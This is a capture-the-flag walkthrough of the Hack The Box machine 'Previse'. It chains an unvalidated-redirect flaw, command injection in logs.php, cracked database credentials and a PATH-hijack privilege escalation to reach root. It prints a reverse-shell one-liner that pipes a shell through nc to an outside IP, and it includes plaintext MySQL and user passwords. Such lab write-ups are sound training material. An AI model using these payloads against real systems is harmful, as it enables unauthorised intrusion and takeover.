Home Previse HTB
Post
Cancel

Previse HTB

[Pasted image 20210808095245.png]

An easy box with an unvalidated redirection vulnerability, access to registration page and dump the file sitebackup.zip and exploit a post parameter to get remote code execution on the machine. Use the mysql configuration file and enumerate accounts in database and crack the password to get user on the machine. For root the sudo user can run a script where the attacker can inject the path variable and exploit the `date` function.
  • Nmap
  • Recon
  • Unvalidated Redirect Vulnerability
  • User escalation
  • Root Privilege Escalation

As usual let’s start with a Nmap Scan.

Nmap

First thing first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We get back the following result showing that two ports are open:

  • Port 22: running OpenSSH 7.6p1
  • Port 80: running Apache httpd 2.4.29

Recon

Port 80

We get a login page that does not have links to any other pages. Therefore, we’ll run FUFF to enumerate directories and pages. I could not find any directories so i jumped into finding the files with .php extension.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
root@kali:~/ctf/htb/Previse# ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.185.121/FUZZ.php 
 
        /'___\  /'___\           /'___\                                                                                                                               
       /\ \__/ /\ \__/  __  __  /\ \__/        
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\       
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/       
         \ \_\   \ \_\  \ \____/  \ \_\        
          \/_/    \/_/   \/___/    \/_/        

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.185.121/FUZZ.php
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

#                       [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 155ms]
index                   [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 155ms]
login                   [Status: 200, Size: 2224, Words: 486, Lines: 54, Duration: 155ms]
files                   [Status: 302, Size: 4914, Words: 1531, Lines: 113, Duration: 159ms]
header                  [Status: 200, Size: 980, Words: 183, Lines: 21, Duration: 154ms]
nav                     [Status: 200, Size: 1248, Words: 462, Lines: 32, Duration: 156ms]
#                       [Status: 302, Size: 2801, Words: 737, Lines: 72, Duration: 2419ms]
download                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3433ms]
footer                  [Status: 200, Size: 217, Words: 10, Lines: 6, Duration: 160ms]
                        [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 4430ms]
status                  [Status: 302, Size: 2966, Words: 749, Lines: 75, Duration: 160ms]
logout                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 155ms]
accounts                [Status: 302, Size: 3994, Words: 1096, Lines: 94, Duration: 155ms]
config                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 154ms]
logs                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 155ms]

If we notice the most of the pages have 302 response code with different sizes. So this website is vulnerable to unvalidated redirect vulnerability.

So let’s intercept with burp and see what we have in the page before redirection happens.

Unvalidated Redirect Vulnerability

Get request to accounts.php

[Pasted image 20210808075923.png]

Response from Server

[Pasted image 20210808080009.png]

[Pasted image 20210808080032.png]

We have complete accounts.php page sent to us before redirection happends. And it contains a form in the response which was not visible in the browser because the browser redirects the pages to login.php.

Let’s save the page locally and send a post request from accounts form.

[Pasted image 20210808080208.png]

I registered my self as a user and was able to login into the website.

[Pasted image 20210808080307.png]

After scrolling through the pages, we have a files.php page which contains backup of the website

[Pasted image 20210808080418.png]

URL : 10.129.185.121/download.php?file=32

I downloaded the backup file and went through the source code for a while.

[Pasted image 20210808080612.png]

[Pasted image 20210808081101.png]

We have control over the post parameter inside the exec function in logs.php page.

[Pasted image 20210808081320.png]

The very first I would like to see is if we can send a ping packet from the server.

[Pasted image 20210808081626.png]

[Pasted image 20210808081609.png]

So we have successful remote code execution (RCE). Let’s exploit this and get a reverse shell.

[Pasted image 20210808081816.png]

Payload = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.78 443 >/tmp/f

[Pasted image 20210808082617.png]

And we have a shell which is non-interactive, let’s make it more interactive shell.

1
python -c 'import pty;pty.spawn("/bin/bash")'
1
2
stty -raw echo 
fg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
www-data@previse:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
m4lwhere:x:1000:1000:m4lwhere:/home/m4lwhere:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

We have one user m4lwhere

User Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
cat config.php
<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

We have mysql database credentials in config.php. So i logged into mysql database with the given credentials.

[Pasted image 20210808085546.png]

We have crypt hash with salt, let’s crack it with hashcat.

[Pasted image 20210808091901.png]

Password: ilovecody112235!

[Pasted image 20210808092039.png]

We are in.

[Pasted image 20210808092100.png]

Root Escalation

[Pasted image 20210808092238.png]

[Pasted image 20210808092754.png]

There are two possiblities, I see how to exploit. One is through changing the PATH variable and point date function to our exploit file and other is to make a softlink on to the files mentioned in the script.

Let’s go with date function which is fairly easy way to do it.

[Pasted image 20210808094530.png]

I wrote whoami inside a date file and added it to our PATH variable

[Pasted image 20210808094623.png]

[Pasted image 20210808094658.png]

File name was attached with root which is our whoami command as it as root user.

[Pasted image 20210808094958.png]

Let’s put our reverse shell payload and run again.

[Pasted image 20210808094927.png]

We get a shell and We are root on the machine.

This post is licensed under CC BY 4.0 by the author.